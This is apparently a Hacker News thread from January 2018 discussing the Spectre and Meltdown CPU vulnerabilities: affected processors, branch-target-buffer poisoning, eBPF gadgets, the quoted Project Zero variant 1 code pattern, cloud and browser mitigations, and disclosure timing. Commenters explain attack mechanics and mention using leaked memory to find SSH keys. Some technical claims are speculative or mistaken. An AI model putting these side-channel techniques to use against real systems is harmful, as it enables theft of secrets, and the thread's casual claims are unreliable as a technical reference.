Thanks for clarifying Mike, should be interesting to see how this actually pans out.


Not just user memory reads. AMD CPUs won’t speculate loads from userland code directly to kernel memory, ignoring privilege checks (“Meltdown”). But they are still subject to the “Spectre” attack, which can disclose kernel memory by taking advantage of certain code patterns (which normally would be harmless) in kernel code.


But that means the root user or someone with root effective privs or CAP_* to load programs into a kernel interpreter or kernel JIT. If you've given someone permission to do this from a user process you've probably opened up to more mundane issues. I suspect this is why AMD says the issue is near zero, if you've given away the keys to the kernel you're already in trouble.

AMD's ASID blocks the issues for VM guests (and root users on VM guests).


For variant 1, a kernel JIT is definitely helpful, which is why the Project Zero PoC used it, but it's not required.

For variant 2, Project Zero used the eBPF interpreter as a gadget, a fake branch destination, without having to actually create an eBPF program or use the normal userland-facing eBPF APIs at all. And they only chose it as the least "annoying" option (see quote below).

edit: I'm not sure how ASID support would mitigate either of those variants, though there may be something I'm not thinking of. (It would help with variant 3, but that's the variant AMD wasn't vulnerable to in the first place.)

quote:

> At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.


To make it a bit clearer how this works: the Variant 2 exploit poisons the branch target buffer to cause the processor's speculative execution in kernel space to jump to an entirely attacker-controlled destination when it hits a branch that matches the information the attacker has placed into the BTB. The actual retired instructions don't go this way of course - the processor detects the misprediction and goes back to execute the real code path - but the speculatively executed path still leaves evidence behind in the caches.


But somehow you have to get that kernel address in the first place in order to alias it in the BTB. How do you get that without root?


They test how a series of branches are predicted after returning from a hypercall, which lets them basically dump out the state of the BTB. From that, and knowledge of where the branches are in the hypervisor binary (the binaries themselves aren't really a secret, only the relocated load address is) they can figure out the load address of the hypervisor.

See the section "Reading host memory from a KVM guest / Locating the host kernel". It's terribly clever.


But if you use AMD ASID it blocks this as memory mappings for VM guests are in a completely separate address space.

What I was wondering was for local OS user mode to local OS root / kernel mode access; i.e. user to kernel privilege escalation.


It isn't obvious at all how a separate address space would block that method.

What would block it is flushing the branch predictor state when switching privilege levels and/or address spaces.


I've tried reading it and I still find all of this very confusing. Could you ELI5?


You boot up your own copy of Ubuntu LTS-whatever and read the address of it as root.

KASLR is not enabled everywhere, and where it is, there are other attacks to defeat it, which are mentioned in the paper.


I'm not sure I see how to use the Spectre attack on AMD without running in kernel context. What am I missing?


I should clarify I mean user to root privilege escalation.

I totally understand how the breaking out of the javascript sandbox attack works and the fact that IPT won't help with that. With Linux's clone(), you could clone without CLONE_VM and use CLONE_NEWUSER|SYSVMSEM and then unmap everything except the Javascript interpreter / JIT and leave a shared memory map and communicate only via the shared memory map and SYSV semaphores for synchronisation. Obviously this wouldn't be available on other platforms.


By "user to root privilege escalation", I'll assume you mean leaking kernel data without root, since this attack doesn't directly allow escalating privileges at all.

For variant 1, you would need to find some legitimate kernel code, accessible by syscall, that looks at least somewhat similar to the example in the Project Zero blog post:

    if (untrusted_offset_from_caller < arr1->length) {
        unsigned char value = arr1->data[untrusted_offset_from_caller];
        unsigned long index2 = ((value&1)*0x100)+0x200;
        if (index2 < arr2->length) {
            unsigned char value2 = arr2->data[index2];
        }
    }
In practice, you may not be able to find something nice like "((value&1)*0x100)+0x200", but even if it simply used 'value' as an index, you would be able to at least narrow it down to a range. Other code patterns may work too (and potentially be more powerful?), e.g. conditional branches based on 'value'.

For variant 2, see caf's answer to you in another thread.


>>> By "user to root privilege escalation", I'll assume you mean leaking kernel data without root, since this attack doesn't directly allow escalating privileges at all.

The attack allows to read all the memory. Isn't there a way to scan for passwords or ssh keys and turn that into a privilege escalation?


Sure, SSH keys would probably work on a system with SSH enabled; I just wouldn't count that as "directly". (That would include most servers but exclude most Android devices; I have no idea whether there are other escalation methods for Android.)


Direct or indirect is meaningless at this point. The exploit is proven, they just have to determine the "best" memory locations to read to make something "useful" out of it. Then it's bundled together as an exploit kit and it's Armageddon.


> For variant 1, a kernel JIT is definitely helpful, which is why the Project Zero PoC used it, but it's not required.

If I'm understanding the post correctly it says that JIT's not required for Intel CPUs, but is required for AMD.


Their particular exploit for variant 1, which uses eBPF, only worked on AMD with the eBPF JIT, i.e. it did not work with the eBPF interpreter. But there are many other potential avenues to exploit that variant which have nothing to do with BPF. The result does suggest that it may generally be harder to trigger variant 1 on AMD processors (because they doesn't speculate as much?), but harder ≠ impossible.


Ah ok, thanks for clarifying.


Do you need root or comparable privileges to take advantage of BPF? I did not think that was the case. My understanding was that BPF code executes within the kernel.

BPF is employed by the `bpf()` syscall for socket packet filtering, as well as by `seccomp` itself for its syscall filtering. Is this threat vector not available to untrusted processes?


iirc I think that the BPF JIT is disabled by default? Your kernel might be compiled with `CONFIG_BPF_JIT`, but I think the sysctl knob (`bpf_jit_enable`) is set to 0 by default. Also there's a sysctl for unprivileged BPF called `unprivileged_bpf_disabled`. On my system it seems to default to 0.

https://elixir.free-electrons.com/linux/v4.15-rc6/source/ker...


That article links a commit [1] that contradicts this statement

> AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against. The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault.

And Axios [2] that Zdnet quotes gave a comment from AMD:

> "To be clear, the security research team identified three variants targeting speculative execution. The threat and the response to the three variants differ by microprocessor company, and AMD is not susceptible to all three variants. Due to differences in AMD's architecture, we believe there is a near zero risk to AMD processors at this time. We expect the security research to be published later today and will provide further updates at that time."

And a comment from ARM: > Please note that our Cortex-M processors, which are pervasive in low-power, connected IoT devices, are not impacted.

[1] https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/...

[2] https://www.axios.com/how-the-giants-of-tech-are-dealing-wit...


My read is that vulnerable processors generally have to:

1. Have out of order execution

2. Have aggressive speculative memory load / caching behavior

3. Be able to speculatively cache memory not owned by the current process (either kernel or otherwise)

4. Have deterministic ways of triggering a speculative load / read to the same memory location

2 is probably the saving grace in ARM / low power land, given they don't have the power budget to trade speculative loads for performance (in the event they're even out of order in the first place).

Caveat: I'm drinking pretty strong Belgian beer while reading through these papers.


How does that pertain to the vulnerabilities that involve eBPF? My understanding is that eBPF code executes within the kernel, and so would run at the same privilege level.


"Intel suffers a Meltdown" should be an apt headline for tomorrow's headlines.


Another good article: https://www.theregister.co.uk/2018/01/02/intel_cpu_design_fl...

"AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against. The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault."


Google's post is newer and has more insights, the registry article is now outdated.


The register has more details. Worth a read.


the google site has the actual white papers detailing the attacks.


The register has the tweet with actual code for spectre, and more details from the manufacturers and potential fixes. Seriosuly? They're both worth a read.


I think the point is that your quoted section of the reg article is not correct according to the new information from Google.


@lern_too_spel

The AMD engineer could be right if talking about Ryzen, and/or he isn't mentioning user-user and user-kernel boundaries.

AMD isn't affected in nearly the same way as Intel/ARM are: https://twitter.com/ryanshrout/status/948683677244018689


Yeah that's a good one, hope they keep it updated / link to new info / posts as they come out.


Hard to find a good spot for this, but: Thanks to anyone involved! From grasping the magnitude of this vulnerability to coordinating it with all major OS vendors, including Open Source ones that do all of their stuff more or less „in the open“, it was almost a miracle that the flaw was leaked „only“ a few days before the embargo - and we‘ll all have patches to protect our infrastructure just in time.

Interestingly, it also put the LKML developers into an ethical grey zone, as they had to deceive the public the patch was actually fixing something else (they did a good and right thing there IMHO).

Despite all the slight problems along the way, kudos to any of the White Hats dealing with this mess over the last months and handling it super graceful!


Consider how many other of such "gray" patches could already be in the kernel ;)


I'm not that savvy with security so I need a little help understanding this. According to the google security blog:

> Google Chrome

> Some user or customer action needed. More information here (https://support.google.com/faqs/answer/7622138#chrome).

And the "here" link says:

>Google Chrome Browser

>Current stable versions of Chrome include an optional feature called Site Isolation which can be enabled to provide mitigation by isolating websites into separate address spaces. Learn more about Site Isolation and how to take action to enable it.

>Chrome 64, due to be released on January 23, will contain mitigations to protect against exploitation.

>Additional mitigations are planned for future versions of Chrome. Learn more about Chrome's response.

>Desktop (all platforms), Chrome 63:

> Full Site Isolation can be turned on by enabling a flag found at chrome://flags/#enable-site-per-process. > Enterprise policies are available to turn on Site Isolation for all sites, or just those in a specified list. Learn more about Site Isolation by policy.

Does that mean if I don't enable this feature using chrome://flags and tell my grandma to do this complicated procedure I (or she) will be susceptible to getting our passwords stolen?


It probably means if you want mitigations right now, you can flip that flag. Otherwise wait for Chrome to auto-update with new versions that have mitigations enabled by default.


Would I be correct in assuming a browser-level mitigation isn't necessary if you're running a patched OS?


The OS patch stops you reading kernel space from user space trivially (ie. without eBPF in the Project Zero example). You can still cause leakage from the same context, for example, the V8 JIT can read all of the processes memory, without site isolation that can include data on other web pages, passwords, cookies, etc.


Your OS needs patching, as do any programs which handle secret stuff like passwords, cookies, or tokens and interact with the internet (ie. web browsers).


Wasn't there a PoC for a second issue of js reading memory from its own process? Could potentially be an issue (eg reading data from another website)


no


From a recently posted patch set:

Subject: Avoid speculative indirect calls in kernel

Any speculative indirect calls in the kernel can be tricked to execute any kernel code, which may allow side channel attacks that can leak arbitrary kernel data.

So we want to avoid speculative indirect calls in the kernel.

There's a special code sequence called a retpoline that can do indirect calls without speculation. We use a new compiler option -mindirect-branch=thunk-extern (gcc patch will be released separately) to recompile the kernel with this new sequence.

We also patch all the assembler code in the kernel to use the new sequence.


Link?


Text and patch start here: https://lkml.org/lkml/2018/1/3/780

Also, see Linus' response here: https://lkml.org/lkml/2018/1/3/797


Ahh Linus, never change.



"Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at"

Does anyone have any color/details on how this came to be? A major fundamental flaw exists that affects all chips for ~10 years, and multiple independent groups discovered them roughly around the same time this past summer?

My hunch is that someone published some sort of speculative paper / gave a talk ("this flaw could exist in theory") and then everyone was off to the races.

But would be curious if anyone knows the real version?



Jann Horn's results & report pre-date the blog post though. The topic was "ripe", so to speak, so multiple parties investigated it at roughly the same time.


Yeah, the blog post says they knew since June 2017, with that blog post being from July.

> This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh's work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-....


AIUI, Anders Fogh has collaborated with people at TU Graz on various occasions previously: I'd assume they already knew about his work prior to the blog post.


There was a paper "A Javascript Side-Channel Attack on LLC" in 2015 which seem similar to me, maybe it drove some research toward timing/caching mechanism at the CPU level and its exploitation with a 'side channel' attack.


Considering it includes most cpus from the last decade (or even last two), shouldn't they delay it a little bit longer so that not only cloud businesses but also more mainstream companies get the time to deploy patches and tests ?


Azure's response: https://azure.microsoft.com/en-us/blog/securing-azure-custom...

This part is interesting considering the performance concerns:

"The majority of Azure customers should not see a noticeable performance impact with this update. We’ve worked to optimize the CPU and disk I/O path and are not seeing noticeable performance impact after the fix has been applied. A small set of customers may experience some networking performance impact. This can be addressed by turning on Azure Accelerated Networking (Windows, Linux), which is a free capability available to all Azure customers."


Disclosure: I work on Google Cloud.

If you run a multitenant workload on a linux system (say you're a PaaS or even just hosting a bunch of WordPress side by side) you should update your kernel as soon as is reasonable. While VM to VM attacks are patched, I'm sure lots of folks are running untrusted code side by side and need to self patch. This is why our docs point this out for say GKE: we can't be sure you're running single tenant, so we're not promising you there's no work to do. Update your OSes people!


No offence intended as I'm sure it's a bit of a madhouse there right now, but is your statement really correct? I read the Spectre paper quite carefully and it appears to be unpatchable. Although the Meltdown paper is the one that conclusively demonstrated user->kernel and vm->vm reads with a PoC, and Spectre "only" demonstrated user->user reads, the Spectre paper clearly shows that any read type should be possible as long as the right sort of gadgets can be found. There seems no particular reason why cross-VM reads shouldn't be possible using the Spectre techniques and the paper says as much here:

For example, if a processor prevents speculative execution of instructions in user processes from accessing kernel memory, the attack will still work.

and

Kernel mode testing has not been performed, but the combination of address truncation/hashing in the history matching and trainability via jumps to illegal destinations suggest that attacks against kernel mode may be possible. The effect on other kinds of jumps, such as interrupts and interrupt returns, is also unknown

There doesn't seem to be any reason to believe VM to VM attacks are either patched nor patchable.

My question to you, which I realise you may be unable to answer - how much does truly dedicated hardware on GCE cost? No co-tenants at all except maybe Google controlled code. Do you even offer it at all? I wasn't able to find much discussion based on a 10 second search.


Sorry for the confusion.

I have been most focused on people being concerned that a neighboring VM could suddenly be an attacker. You're right that the same kind of thing that affects your JavaScript engine as a user affects say Apache or anything that allows requests from external sources. However, that situation already has a much larger attack surface and people in that space should be updating themselves whenever there's any CVE like this.

My concern was that the Azure announcement made it sound like they've done the work, so nothing is required. That's not strictly true, even though providers have mitigated one set of attacks at the host kernel layer, so I wanted to correct that.


I'm not sure about GCE but in Azure often the largest node size in a particular family (i.e. D15_v2, G5, M128, etc.) is isolated / dedicated to a single customer.


Interesting that they left it this late.


Disclosure: I work on Google Cloud.

Like the AWS reboots, people will notice. So in the interest of the embargo, both Azure and AWS waited to update as late as they felt was safe. Since we do live migrations and host kernel updates all the time, nobody noticed us :).


Someone correct me if I understood this wrong. The way they are exploiting speculative execution is to load values from memory regions which they don't have permission to a cache line, and when the speculation is found to be false, the processor does not undo the write to the cache line?

The question is, how is the speculative write going to the cache in the first place? Only retired instructions should be able to modify cache lines AFAIK. What am I missing?

Edit: Figured it out. The speculatively accessed memory value is used to compute the address of a load from a memory location which the attacker has access to. Once the mis-speculation is detected, the attacker will time accesses to the memory which was speculatively loaded and figure out what the secret key is. Brilliant!


Important to note that at this point they're only reading one bit at a time from kernel memory, but it could probably be changed to read more--exactly how many branches it could compare before the mis-speculation is detected is not discussed, and that could be an area for large speedups in the attack.


Wow, what a find for the Project Zero team. This team and idea can only be described as a success, well done.


"These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running them."

Curious. All other reports I've read state that AMD CPUs are not vulnerable.


See the Twitter thread here: https://twitter.com/nicoleperlroth/status/948678006859591682

(Edit: there are 9 posts total, go to her user page to see them all)

Seems there are two issues. One, called Meltdown, only effects Intel and is REALLY bad, but the kernel page table changes everyone is making fixes it.

The other, dubbed Spectre, is apparently common to the way all processors handle speculative execution and is unfixable without new hardware.

I’d like to know more about that but I haven’t seen anything yet.

Whoever discovered this stuff on Google’s team deserves some sort of computer security Nobel prize.


That's not even close to a thread...

You can see all the tweets here (courtesy of @svenluijten): https://twitter.com/i/moments/948681915485351938.


After reading that thread, I sort of wonder if this is the catalyst for the next tech bust. Prices on the basic building block of the modern tech industry (a server shard) going up 30%, or even more as shared/virtual services must be decommissioned for isolation? Surely it’s an alarmist thing to think and I don’t think it’s likely, but if you asked me yesterday the likeihood of an underlying security vulnerability effecting every processor since 1995 I’d have said probably not.

Major props to the teams working on this... now time for us all to hold onto our pants as we ask for budget increases that will make shareholders demand blood.


would be interesting to look at public companies where server costs going up 20% would kill their profit margins.


I don't think this is likely anywhere.

The only sorts of companies where server costs could increase hugely due to a sudden need for hardware isolation are those where they're running tiny or incredibly bursty workloads. Big companies like Netflix that use tons of cores can just binpack their work all together on the same hardware so their jobs only share hardware with other jobs controlled by the same company. Effectively, cloud providers will start offering sub-clouds into which only your own jobs will be scheduled.

This is actually how cloud tech has worked for many years internally. I worked at Google for a long time and their cluster control system (Borg) had a concept called "allocs" which were basically scheduling sub-domains. You could schedule an alloc to reserve some resources, and then schedule jobs into the alloc which would share those resources. Allocs were often used to avoid performance-related interference from shared jobs, e.g. when a batch job kept hogging the CPU caches and slowing down latency sensitive servers. I suppose these days VMs and containers do a similar job, though I think the Borg approach was nicer and more efficient.

I guess this sort of per-firm isolation will become common and most companies costs won't change a huge amount. The people it'll hit will be small mom-and-pop personal servers, but they're unlikely to care about side channel attacks anyway. So I wouldn't sell stock in cloud providers just yet.


The linked thread suggests that Spectre doesn't have _any_ mitigation.

> The business/economic implications are not clear, since eventually the only way to eradicate the threat posed by Spectre is to swap out hardware.

Is this fully accurate, there's no software mitigation available now?

From [0], the above may be true:

> There is also work to harden software against future exploitation of Spectre, respectively to patch software after exploitation through Spectre .

There is 'work'? No current patch? So Spectre is unpatched?

This point doesn't seem to be being highlighted but appears particularly important.

[0] https://meltdownattack.com/#faq-fix


Yes, from my understanding, Spectre is an architectural-level flaw in the so-called speculative execution unit. In other words, Spectre will only be fixed once Intel, AMD, and ARM redesign the unit and release new processors. Given the timelines of CPU design, this will take 5-10 years at least.

On the positive side, the flaw is very difficult to exploit in a practical setting.


> On the positive side, the flaw is very difficult to exploit in a practical setting.

Is it?

"As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs"


So is this fixable or not?



There are possible mitigations for cloud providers: 1) pay $x / hour and run on shared machine with possibility of an attack; 2) pay $y / hour (where x < y) and run all your processeses on dedicated machines without anybody else.

Moreover the option 2) already exists for large customers and security sensitive applications (e.g. CIA dedicated cloud built by Amazon).


Amazon instances can be created with the dedicated flag. The host hardware will be dedicated to you, not shared with any other users. It should mitigate the attack.

The flag has a fixed fee in the thousands of dollars and each instance is 10% more expensive.


I didn’t find out there were more than 4 posts until after I made my comment (thus the edit).

Thanks for the handy link.


I can't really see how it would be fixable even with new hardware.

Speculative execution is fundamental to getting decent performance out of a CPU. Without it you should probably divide your performance expectations by 5 at least.

Rolling back all state rather than just user visible state in the CPU is neigh on impossible. When you evict something from the cache, you delete it. Undeleting is hard. There are also a lot of other non-user-visible bits of state in a CPU.


I agree that we'll probably see new attacks in this area for a long time.

That said, the main new ingredient of Spectre seems to be the idea that userspace can poison the branch target buffer to cause speculative execution of arbitrary code in kernel space. That part of the attack should be fairly easy to mitigate with new hardware, by XORing (or hashing) the index into the BTB with a configurable value that depends on the privilege level. So each process has its own "nonce", and they're all different from the kernel's.

Then BTB poisoning won't work unless the attacker knows its own and the other context's nonce. Even if further attacks are found that leak this nonce, they could be mitigated by changing the nonce at regular intervals.


Couldn't you do something like have a separate chunk of "speculative cache" which you only commit to the main cache once the speculatively-executed instructions are retired? Sounds complex, sure - but it seems like that would give you the performance benefits of speculative execution while still being able to roll back (or prevent in the first place) any cache-state side effects when branches were mispredicted. Could also imagine processors start segregating cache by privilege level.

I guess part of the question you're raising is: are there so many different caches, translation buffers, etc. in a modern CPU that keeping 'uncommitted buffers' for the state of all of them would be just as complex as throwing a whole other core in there?


No, that would not be enough. CPUs speculatively execute across multiple branches. Even if you had a separate speculative cache for every code path, you could still build a side-channel from the amount of contention. [1]

[1] https://eprint.iacr.org/2016/613.pdf

> Both hardware thread systems (SMT and TMT) expose contention within the execution core. In SMT, the threads effectively compete in real time for access to functional units, the L1 cache, and speculation resources (such as the BTB). This is similar to the real-time sharing that occurs between separate cores, but includes all levels of the architecture. [...] SMT has been exploited in known attacks (Sections 4.2.1 and 4.3.1)


Possibly - but that's an entirely new processor design. That would take years to get released an adopted.

The scary thing is that you can't fix this in software.


It effectively means wiping the caches, TLBs, BTBs and any other caches and optimisations on any form of context switch, as far as I can see? Which yes will likely require new silicon.


> computer security Nobel prize

While they're not as big of a deal AFAIK, we do have the Pwnie Awards: https://pwnies.com/


We should have an annual vulnerability/amelioration award (the Cerberus?) and give one to those guys.


You can find the details below. They've tried AMD CPUs also.

https://googleprojectzero.blogspot.com/2018/01/reading-privi...


"We reported this issue to Intel, AMD and ARM on 2017-06-01"

What!


You know it's a bad one when Project Zero allows more than its usual 90-day deadline...


"Which systems are affected?" – "All systems." – "Come again?"


From the FAQ on spectreattack.com:

> Q: Am I affected by the bug?

> A: Most certainly, yes.

Scary.


If you're using an in order processor, a Nexus 9 tablet say, then you should be safe.


I wasn't thinking straight last night. Basically all in order application processors use speculative execution.


Even a low-power core like a Cortex-M7 can do some speculative execution through its branch predictor.

Though of course a M7 isn't running VMs, and probably isn't running any kind of attacker-controlled code (scripting included - its there, but rare), so many of the vectors aren't present.


Then front-runs the negotiated timeline anyway, catching projects like Xen off guard (it seems like)[0]. Will be interested to read the postmortem of the entire process from start to finish, and Xen is promising one from their perspective. I'd be especially interested to understand whether public intel was concrete enough to rush this out the door, because it didn't seem like it was, but I probably missed something.

[0]: https://xenbits.xen.org/xsa/advisory-254.html


I reimplemented variant 3 based solely on clues from twitter posts yesterday.

I am by no means a computer security guru - I just did a CPU architecture course at uni and figured I'd cowboy up an implementation. It worked nearly first time, and can read both kernel and userspace pages from userspace by fooling the branch predictor into going down the wrong path, and relying on the permission checks to be slower than the data reads from a virtually addressed cache. It can only access stuff already cached though, so you can't do a full memory dump with it.


speculation was apparently hitting very close to home allowing attackers with resources (think nation states) to start developing their own tooling. at least this early announcement allows people with sensitive data to quickly move to dedicated instances.

edit: well it didn't take a nation state after all: https://twitter.com/brainsmoke/status/948561799875502080 - given that, you can be sure that everybody who counts is frantically launching these on your clouds gathering whatever they can.


How much in advance do the intel managers have to register a stock sell?


The CEO dropped his stock holdings down to the minimum allowed by their board bylaws in December.

https://www.fool.com/investing/2017/12/19/intels-ceo-just-so...


For his sake, I hope longer than 6 months!


You mean without getting whomped for insider trading? I don't think they're allowed to do it in advance at all.


As far as I know they HAVE to register a trade in advance. I.E. three months ahead: "I will sell 600 shares on 15th of December if the share price is above 50". This information is public and other people can use this information before the trade actually happens.


Note that's not a legal requirement. That's just a policy many companies have to lower the risk of insider trading.


It looks like he registered for the trade in October, well after Intel was made aware of the issue.


We won't know until we have the full details. From the linux patches it looked like that AMD x86-64 processors were not affected.

But the sentence you quote adds AMD back into play. Maybe some of its ARM processors? e.g. AMD Opteron A1100?


They weren’t effected by the really bad Intel big names Meltdown. They’re still susceptible to Spectre.


And yet it also says that AMD devices running Android are not vulnerable.

I'd be curious how those two statements should be reconciled.


Not exactly; it says "we are unaware of any successful reproduction of this vulnerability that would allow unauthorized information disclosure on ARM-based Android devices."


Links to descriptions of similar vulnerabilities in AMD and ARM processors would be very welcome.


Here's a list of what google tested:

Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" in the rest of this document)

AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" in the rest of this document)

AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" in the rest of this document)

An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called "ARM Cortex A57" in the rest of this document)

https://googleprojectzero.blogspot.com/2018/01/reading-privi...


So there's a bit of an unknown if AMD's most recent generation of processor has the Spectre vulnerability?


We know that the scariest attack "meltdown", cannot be reproduced on AMD or ARM chips at all[1]. The second attack "Spectre" is also greatly mitigated due the neural network predicting pathways for the application. Thus it's unlikely/less-likely that you'll be able to access other locations in memory[2]. However, it's definitely possible.

[1] https://meltdownattack.com/meltdown.pdf

[2] https://spectreattack.com/spectre.pdf


ARM advisory [1] does state that Cortex-A75 is vulnerable to variant 3 (Meltdown).

[1] https://developer.arm.com/support/security-update


Has anyone tried the Spectre PoC in the paper on ThreadRipper? I can confirm it works on my i7-7700K.


Sounds like maybe SOME ARM and SOME AMD are implicated, especially since the Android ARM CPUs appear to be fine...


There aren't really any special Android ARM CPUs, maybe they are confident it doesn't really work on Android because it's very difficult to get the timing precision and low-level assembly sequences in Java/ART compiled code. Though I wonder how that squares up with JNI.

I think the key to the statement is in any case that you need to differentiate between what is possible on the processor architecture level when you have full software control, and what is possible on an operating system level, where 3rd party applications are further restricted in various arbitrary ways such as only allowed to use Java, limited access to high resolution timing primitives, etc. that can make practical exploitation impossible, even if the flaw is present.

It's difficult to reason about because it's hard to tell if you can manipulate a JIT runtime into generating the code you need for the exploit to work - and as the JavaScript implementations show, the answer is often "yes".


JIT engines (and compilers) often generate a familiar instruction patterns. Many JIT engines Target specific languages (like JS) and as result have "simpler" optimizers (less time to do this) and possibly more stable instruction patterns. So my money is on somebody fuzzing the required JS code.


You can develop Android applications in C/C++ using the NDK, thus, giving you full software control if needed.



yeah the intel response page is filled with people claiming intel is evil for even mentioning amd

https://news.ycombinator.com/item?id=16064545


To be fair, the Intel post alludes to collaborating with AMD/ARM on mitigating Spectre, but userspace memory leaking is wholly separate from kernel memory leaking (Meltdown, which only affects Intel processors).


It's a developing story, but from the information we have so far, it does look like Intel involving AMD is a disingenuous since AMD processors are not affected by the most serious of the issues.


It's too early to say which is ultimately the most real-world serious.

From the Spectre note (which does affect AMD):

In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.

How quickly are we going to see attacks targeting BTC/ETH wallets, apps etc. on clients and cloud hosted exchanges?


Hardware wallet or bust right now, right? Use a private key that has never touched the internet?


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: